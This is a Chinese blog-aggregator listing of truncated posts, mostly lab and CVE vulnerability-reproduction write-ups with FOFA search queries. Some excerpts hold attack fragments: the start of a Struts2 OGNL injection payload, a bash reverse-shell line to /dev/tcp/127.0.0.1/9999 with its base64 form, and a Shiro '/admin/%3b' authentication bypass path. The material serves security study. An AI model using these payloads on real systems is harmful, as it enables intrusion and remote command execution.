网安漏洞复现

大专学历的小老弟网安岗位面试经验分享,掰开给各位大佬助助兴

过完年从不喜欢的职业离职后,专心学习渗透技术到现在也有快两个月了,因为没有什么经济收入所以想着能否找一份实习的工作或者初级渗透工作来养活自己吃饭问题,投了近100家后收到了些面试电话,废话不说了,下面是三家面试经验,还请各位学长、老师哪里有不好的地方多多指教北京某科技安全公司(渗透测试)1.你好,是某某先生嘛,我是某某公司的,今天下午收到您的简历,这件简单了解一下,反序列化漏洞函数能说出几个吗?s
程序学到昏·2024-01-25 14:57

局域网安全-DHCP欺骗实验

实验大纲1.构建网络拓扑结构图2.路由器配置3.DHCP服务器配置4.域名服务器配置5.web服务器配置6.配置路由器R07.配置路由器R18.PC自动获取ip信息9.修改web服务器主页10.PC访问web服务器11.构建伪造web服务器12.构建伪造DHCP服务器13.构建伪造DNS服务器14.PC重新获得网络信息15.PC访问web服务器1.构建网络拓扑结构图2.路由器配置R0路由器两端是两
旺旺仙贝·2024-01-25 14:04

Monitorr 任意文件上传漏洞复现(CVE-2024-0713)

0x01产品简介Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。0x02漏洞概述Monitorr1.7.6m版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件/assets/php/upload.php的未知功能。对参数fileToUpload的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。0x03复现环境FOFA:body=
OidBoy_G·2024-01-25 06:01

Atlassian Confluence Data Center and Server 权限提升漏洞复现(CVE-2023-22515)

0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluenceDataCenterandServer存在权限提升漏洞,未经身份验证的远程攻击者可以利用该漏洞
OidBoy_G·2024-01-25 06:30

蓝凌OA sysUiExtend.do 任意文件上传漏洞复现

0x01产品简介蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。0x02漏洞概述蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩
OidBoy_G·2024-01-25 06:28

[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2134)

二、漏洞复现春秋云境.com进入靶场开始复现构造payload/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_
free key·2024-01-25 06:41

[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)

二、漏洞复现春秋云境.com进入靶场准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key·2024-01-25 06:10

[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)

二、漏洞复现春秋云境.com进入靶场开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key·2024-01-25 06:10

[漏洞复现] Craft (CVE-2023-41892)

前言本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!一、漏洞情况分析CraftCMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonicCraftCMS4.4.15之前版本存在代码
free key·2024-01-25 06:10

[漏洞复现]Apache Shiro < 1.6.0 验证绕过漏洞(CVE-2020-13933)

二、漏洞复现春秋云境.com进入靶场开始复现/admin/%3b三、漏洞处置建议把靶场关了,跟漏洞说“白白吧”
free key·2024-01-25 06:10

[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2135)

二、漏洞复现春秋云境.com进入靶场开始复现构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key·2024-01-25 06:04

看透繁花,六大经典台词另有深意

同在变革的大潮,《繁花》里“上帝虽不语”,但在这个多变的时代,网安人看后不能不语。变动,便应变;挑战,便应战;变革,便升级。我们在《繁花》里看到安全的门道。1.外行看门面,内行看后门。
亚信安全官方账号·2024-01-25 03:52

D-Tale SSRF漏洞复现(CVE-2024-21642)

0x01产品简介D-tale是一个在2020年2月推出的库,是Pandas数据结构的可视化工具。它具有许多功能,对于探索性数据分析非常方便、支持交互式绘图、3d绘图、热图、特征之间的相关性、构建自定义列等等。0x02漏洞概述D-Tale是Pandas数据结构的可视化工具。3.9.0之前的D-Tale版本的用户可能容易受到服务器端请求伪造(SSRF)的攻击,从而使攻击者能够访问服务器上的文件。0x0
OidBoy_G·2024-01-24 22:45

【复现】Hytec Inter HWL 2511 SS路由器RCE漏洞_25

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述HytecInterHWL2511SS是日本HytecInter公司的一款工业级LTE路由器,可用于远程数据传输
穿着白衣·2024-01-24 22:44

【复现】万户ezoffice协同管理平台 SQL注入漏洞_26

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述万户ezOFFICE协同管理平台分为企业版和政务版。
穿着白衣·2024-01-24 22:44

【复现】奥威亚视屏云平台文件读取漏洞_27

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述奥威亚视屏云平台拥有丰富的应用模块,包括结对帮扶、网络教研、教研共同体、优课汇聚、教学资源、在线巡课、AI
穿着白衣·2024-01-24 22:44

【复现】D-Tale SSRF漏洞(CVE-2024-21642)_26

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述D-Tale数据可视化插件是后端框架Flask与前端框架React组合产生的一款开源的数据可视化分析插件。
穿着白衣·2024-01-24 22:13

密闭空间可燃气体监测终端:守护燃气管网安

在这个瞬息万变的时代,燃气安全问题始终是我们关注的焦点。地下燃气管线因老化或腐蚀等造成燃气泄漏,并扩散至地下管沟、窨井等相邻空间,引发爆炸的风险,尤其在密闭空间中潜在的危险常常不易察觉,但一旦发生事故,后果不堪设想。为了守护我们的生命财产安全,旭华智能一款全新的密闭空间可燃气体监测终端应运而生。一、精准监测,实时反馈这款设备采用激光传感器,集监测可燃气体浓度、水浸、温度、压力等多功能于一身,监测精
旭华智能·2024-01-24 10:41

黑客(网络安全)技术——如何高效自学

前言前几天发布了一篇网络安全(黑客)自学没想到收到了许多人的私信想要学习网安黑客技术!却不知道从哪里开始学起!
学习网络安全的小猿同学·2024-01-24 09:49

漏洞复现】用友NC Cloud portal/file接口任意文件读取漏洞

文章目录前言声明一、用友NCCloudportal/file接口简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。
李火火安全阁·2024-01-24 00:32

用友 GRP U8 UploadFile 命令执行漏洞

文章目录前言声明一、漏洞描述二、影响版本三、漏洞复现前言用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
李火火安全阁·2024-01-24 00:57

【Node】mac 安装n进行node版本管理

使用管理员身份安装:sudonpmin-g查看n是否安装成功:n-V使用n管理node查看node可以使用的列表:nls安装制定版本node查看官方node版本npmviewnodeversions或者node官网安装指定的
努力挣钱的小鑫·2024-01-23 14:31

Atlassian Confluence RCE漏洞复现(CVE-2023-22527)

0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluence/template/aui/text-inline.vm接口处存在velocity模板注入,未
OidBoy_G·2024-01-23 10:24

Aria2 WebUI控制台 任意文件读取漏洞复现(CVE-2023-39141)

0x01产品简介Aria2WebUI控制台是用于下载文件的实用程序。它支持HTTP(S)/FTP/SFTP/BitTorrent和Metalink协议。aria2可以从多个来源/协议下载文件,并尝试利用您的最大下载带宽。它支持同时从HTTP(S)/FTP/SFTP和BitTorrent下载文件,而从HTTP(S)/FTP/SFTP下载的数据上传到BitTorrent群。使用Metalink块校验和
OidBoy_G·2024-01-23 10:24

Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)

0x01产品简介ViessmannVitogate300是用于将ViessmannLON连接到BACnet或Modbus的网关。0x02漏洞概述Vitogate300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。0x03影响范围version<=2.1.3.00x04复现环境FOFA:app="Vito
OidBoy_G·2024-01-23 10:54

PrestaShop购物系统 SQL注入漏洞复现(CVE-2023-30150)

0x01产品简介PrestaShop是一个功能丰富,基于PHP5开发的Web2.0网上购物系统。PrestaShop具有可定制,稳定等特点。整个系统只有5.8MB,易于快速安装。0x02漏洞概述PrestaShop的部分主题中使用LeoCustomAjax模块拓展,LeoCustomAjax模块中可以在/modules/leocustomajax/leoajax.php中使用多个GET参数(cat
OidBoy_G·2024-01-23 10:20

网安渗透面试题,刷这一篇就够了

安全渗透基础测试题,考点涉及到HTML、PHP、MySQL、SQL注入、XSS攻击、CTF、Python等随机题库代码将以下代码保存成1.py文件,运行之,根据随机到的编号做对应的题目!/usr/bin/python--coding:utf-8--importrandomI=["I1","I2"]#SQLXSSPHPJavaScriptHTMLII=["II1","II2"]#PythonIII=
马士兵教育网络安全·2024-01-23 07:40

redis未授权访问全漏洞复现

redis未授权访问全漏洞复现Redis有关的漏洞具有明显的时间分段性,在15年11月之前,主要是未授权导致的数据泄露,获得一些账号密码。
清歌secure·2024-01-23 07:03

一、docker的安装与踩坑

目录一、安装docker(centos7安装docker)1.安装环境前期准备2.参考官网安装前准备3.参考官网安装步骤开始安装docker4.运行首个容器二、安装一些软件的踩坑1.启动docker踩坑
叫我柒月·2024-01-23 07:22

YARN安装及使用教程

YARN官网安装去官网安装安装yarn的下载压缩包,保证注册表和环境变量的硬写入,后期通过yarn安装全局包时比较方便也可以使用npmiyarn-g使用初始化一个新项目yarninit执行完成后,系统会生成一个
Cupid510·2024-01-23 07:31

漏洞复现】SpringBlade export-user接口SQL注入漏洞

文章目录前言声明一、SpringBlade系统简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言SpringBlade是一个由商业级项目升级优化而来的微服务架构采用SpringBoot2.7、SpringCloud2021
李火火安全阁·2024-01-23 02:24

【权限提升】Linux Kernel ebpf 提权漏洞(CVE-2022-23222)

文章目录前言一、漏洞描述二、漏洞影响版本三、漏洞复现四、漏洞修复前言CVE-2022-23222LinuxKernelebpf权限提升漏洞一、漏洞描述eBPF(extendedBerkeleyPacketFilter
李火火安全阁·2024-01-23 02:54

CVE-2020-1938漏洞复现(文末附EXP代码)

CVE-2020-1938ApacheTomcat文件包含漏洞复现1环境搭建1.1Vulhub靶机搭建1.1.1环境安装(1)安装docker$curl-fsSLhttps://get.docker.com
Vitaminapple·2024-01-23 02:53

CVE-2013-2028 经典栈溢出漏洞复现资料整理

一个经典的由整数溢出导致栈溢出的漏洞。下面感觉写的有点乱。复现漏洞CVE-2013-2028:nginx栈溢出漏洞相关基础知识栈的基础知识:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/stack-intro-zh/栈溢出原理:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sta
破落之实·2024-01-23 02:53

CloudPanel file-manager/backend/makefile接口存在远程命令执行漏洞CVE-2023-35885

1.CloudPanel简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。它提供了
sublime88·2024-01-23 02:51

漏洞复现】CloudPanel makefile接口远程命令执行漏洞(CVE-2023-35885)

文章目录前言声明一、CloudPanel简介二、漏洞描述三、影响版本四、漏洞复现五、修复建议前言CloudPanel是一个基于Web的控制面板或管理界面,旨在简化云托管环境的管理。
李火火安全阁·2024-01-23 02:20

好用的网站性能监测与服务可用性监测工具盘点

网站性能检测1.百川云由长亭科技提供,一家专注于网安的实力厂商。
Trc0g·2024-01-23 00:06

Python官网安

前言之前发布了C/C++的开发环境搭建教程,除了C/C++之外,python在部分高校中也很受青睐,同时我也十分建议初学者从Python开始入门。所以今天就来教大家如何搭建Python的开发环境。Python是一门对新手十分友好的语言,这点也体现在了Python的环境搭建中。该文章介绍三种搭建环境的方式,操作都非常简单,各位可以按需选择。安装Python,使用自带的IDLEPython在官网提供了
python-程序员·2024-01-22 17:42

Jeecg jeecgFormDemoController RCE漏洞复现(CVE-2023-49442)

0x01产品简介Jeecg(J2EECodeGeneration)是一款基于代码生成器的低代码开发平台,使用JEECG可以简单快速地开发出企业级的Web应用系统。0x02漏洞概述Jeecg(J2EECodeGeneration)是开源的代码生成平台,目前官方已停止维护。Jeecg4.0及之前版本中,由于/api接口鉴权时未过滤路径遍历,攻击者可构造包含../的url绕过鉴权。并且内部有使用fast
OidBoy_G·2024-01-22 15:39

万户 ezOFFICE wf_process_attrelate_aiframe.jsp SQL注入漏洞复现

0x01产品简介万户OAezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。0x02漏洞概述万户ezOFFICEwf_process_attrelate_aiframe.
OidBoy_G·2024-01-22 15:09

用友NC portal/file 任意文件读取漏洞复现

0x01产品简介用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。0x02漏洞概述用友NC系统/portal/file等接口存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。0x03复现环境FOFA:app="用
OidBoy_G·2024-01-22 15:09

Laykefu客服系统 任意文件上传漏洞复现

0x01产品简介Laykefu是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。0x02漏洞概述Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用
OidBoy_G·2024-01-22 15:38

Python unpickle 命令执行漏洞复现总结

Pythonunpickle命令执行漏洞复现总结漏洞原理环境说明漏洞复现仅做学习参考使用。
yuQnY·2024-01-22 10:46

漏洞复现】(1day)Bladex快速开发平台sql注入漏洞

0x01阅读须知SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!0x02漏洞描述(一)Bladex快速开发平台BladeX是一款精心设计的
煮豆燃豆萁·2024-01-22 08:22

漏洞复现-企语iFair协同管理系统getuploadimage.jsp接口任意文件读取漏洞(附带漏洞检测脚本)

免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述企语iFair协同管理系统同时兼容了Linux、Windows两种操作系统,用户可以根据自己需求进行安装使用。
炼金术师诸葛亮·2024-01-22 08:22

漏洞复现-科荣AIO UtilServlet任意命令执行漏洞(附漏洞检测脚本)

免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述科荣AIOUtilServlet存在任意命令执行漏洞。fofa语句body="changeAccount('8
炼金术师诸葛亮·2024-01-22 08:21

漏洞复现-SpringBlade export-user SQL 注入漏洞(附漏洞检测脚本)

免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责漏洞描述该系统/api/blade-user/export-user接口存在SQL注入漏洞,会造成数据泄露。fofa语
炼金术师诸葛亮·2024-01-22 08:50

Java实现Http代理服务器&通过http代理进行内网安装yum软件

Java实现Http代理服务器&通过http代理进行内网安装yum软件1.Http代理服务器简介2.Http代理服务器Java实现2.1Java源码2.2代码分析说明3.通过http代理进行内网安装yum
冰之杍·2024-01-21 11:29

基于CentOS7_安装Docker

基于CentOS7_安装Docker配置网络,使其能ping通外网安装依赖包yuminstall-yyum-utilsdevice-mapper-persistent-datalvm2下载repo文件wget-O
大沙头三马路·2024-01-21 08:17

openssl 编译动态库 win11 vs2022

官网openssl官网安装perlactivestate_perl_官网需要下载cli_installer下载后双击下载好的exe一般就是下面这个执行文件state-remote-installer.exe
Maguyusi·2024-01-21 07:12
上一页 5 6 7 8 9 10 11 12 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他